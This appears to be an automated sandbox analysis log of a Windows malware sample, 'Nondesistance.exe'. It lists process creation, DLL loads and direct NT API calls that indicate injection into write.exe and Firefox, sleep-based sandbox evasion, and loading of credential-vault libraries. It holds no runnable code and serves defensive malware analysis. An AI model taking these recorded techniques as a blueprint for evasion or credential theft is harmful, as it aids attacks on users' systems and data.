Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_0060E970	10_2_0060E970
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_00609B60	10_2_00609B60
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_00609B57	10_2_00609B57
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_00627400	10_2_00627400
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_006104CB	10_2_006104CB
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_006104D0	10_2_006104D0
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_00609D80	10_2_00609D80
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_00607E00	10_2_00607E00

Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: String function: 32535050 appears 32 times
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: String function: 3257EF10 appears 86 times
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: String function: 324EB910 appears 241 times
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: String function: 32547BE4 appears 82 times
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: String function: 3256E692 appears 78 times

Source: Nondesistance.exe, 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameflinkeste anorectous.exeN vs Nondesistance.exe
Source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewritej% vs Nondesistance.exe
Source: Nondesistance.exe, 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Nondesistance.exe
Source: Nondesistance.exe, 00000009.00000003.20303958082.0000000032443000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Nondesistance.exe
Source: Nondesistance.exe, 00000009.00000002.20405124824.0000000032790000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Nondesistance.exe
Source: Nondesistance.exe, 00000009.00000000.20118343290.0000000000448000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameflinkeste anorectous.exeN vs Nondesistance.exe
Source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewritej% vs Nondesistance.exe
Source: Nondesistance.exe, 00000009.00000003.20300365198.000000003228E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Nondesistance.exe
Source: Nondesistance.exe	Binary or memory string: OriginalFilenameflinkeste anorectous.exeN vs Nondesistance.exe

Source: unknown	Process created: C:\Users\user\Desktop\Nondesistance.exe "C:\Users\user\Desktop\Nondesistance.exe"
Source: C:\Users\user\Desktop\Nondesistance.exe	Process created: C:\Users\user\Desktop\Nondesistance.exe "C:\Users\user\Desktop\Nondesistance.exe"
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
Source: C:\Windows\SysWOW64\write.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Nondesistance.exe	Process created: C:\Users\user\Desktop\Nondesistance.exe "C:\Users\user\Desktop\Nondesistance.exe"	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 4_2_10002D20 push eax; ret	4_2_10002D4E
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_324CE060 push eax; retf 0008h	9_2_324CE06D
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_324CE074 pushfd ; retf	9_2_324CE075
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_324C21AD pushad ; retf 0004h	9_2_324C223F
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_324C97A1 push es; iretd	9_2_324C97A8
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 9_2_324F08CD push ecx; mov dword ptr [esp], ecx	9_2_324F08D6
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_006168F3 push ds; iretd	10_2_006168F5
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_00614159 push es; ret	10_2_006141DB
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_00620930 push ebx; ret	10_2_0062096A
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_006141B0 push es; ret	10_2_006141DB
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_00611A4C push ebx; ret	10_2_00611A55
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_00603BF6 push cs; retf	10_2_00603C79
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_0060A430 push esi; retf	10_2_0060A43B
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_0061CCEC push ebx; retf	10_2_0061CD0B
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_0061CCF0 push ebx; retf	10_2_0061CD0B
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 10_2_00618D0C push ebx; iretd	10_2_00618D0D

Source: C:\Users\user\Desktop\Nondesistance.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe TID: 7220	Thread sleep time: -115000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe TID: 7220	Thread sleep count: 44 > 30	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe TID: 7220	Thread sleep time: -66000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe TID: 7220	Thread sleep count: 62 > 30	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe TID: 7220	Thread sleep time: -62000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 4792	Thread sleep count: 120 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 4792	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 4792	Thread sleep count: 9713 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 4792	Thread sleep time: -19426000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\write.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\write.exe	Last function: Thread delayed

Source: Nondesistance.exe, 00000009.00000003.20300938788.00000000021D5000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021D5000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.0000000002168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25031337146.000000000078F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
Source: write.exe, 0000000B.00000002.25030469735.0000000002DD4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.20675207011.000002D946E0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Nondesistance.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Nondesistance.exe	API call chain: ExitProcess graph end node

Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtReadFile: Direct from: 0x77A929FC	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtQuerySystemInformation: Direct from: 0x77A92D1C	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtProtectVirtualMemory: Direct from: 0x77A87A4E	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtMapViewOfSection: Direct from: 0x77A92C3C	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtWriteVirtualMemory: Direct from: 0x77A92D5C	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtResumeThread: Direct from: 0x77A935CC	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtAllocateVirtualMemory: Direct from: 0x77A92B1C	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtSetInformationProcess: Direct from: 0x77A92B7C	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtNotifyChangeKey: Direct from: 0x77A93B4C	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtReadVirtualMemory: Direct from: 0x77A92DAC	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtAllocateVirtualMemory: Direct from: 0x77A93BBC	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtQueryInformationToken: Direct from: 0x77A92BCC	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtOpenFile: Direct from: 0x77A92CEC	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtCreateFile: Direct from: 0x77A92F0C	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtAllocateVirtualMemory: Direct from: 0x77A92B0C	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtOpenSection: Direct from: 0x77A92D2C	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtQueryVolumeInformationFile: Direct from: 0x77A92E4C	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtDeviceIoControlFile: Direct from: 0x77A92A0C	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtQuerySystemInformation: Direct from: 0x77A947EC	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtQueryAttributesFile: Direct from: 0x77A92D8C	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtSetInformationThread: Direct from: 0x77A92A6C	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtSetInformationThread: Direct from: 0x77A86319	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtCreateKey: Direct from: 0x77A92B8C	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtClose: Direct from: 0x77A92A8C
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtAllocateVirtualMemory: Direct from: 0x77A9480C	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtProtectVirtualMemory: Direct from: 0x77A92EBC	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtWriteVirtualMemory: Direct from: 0x77A9482C	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtOpenKeyEx: Direct from: 0x77A92ABC	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtCreateUserProcess: Direct from: 0x77A9363C	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtQueryInformationProcess: Direct from: 0x77A92B46	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtResumeThread: Direct from: 0x77A92EDC	Jump to behavior
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	NtDelayExecution: Direct from: 0x77A92CFC	Jump to behavior

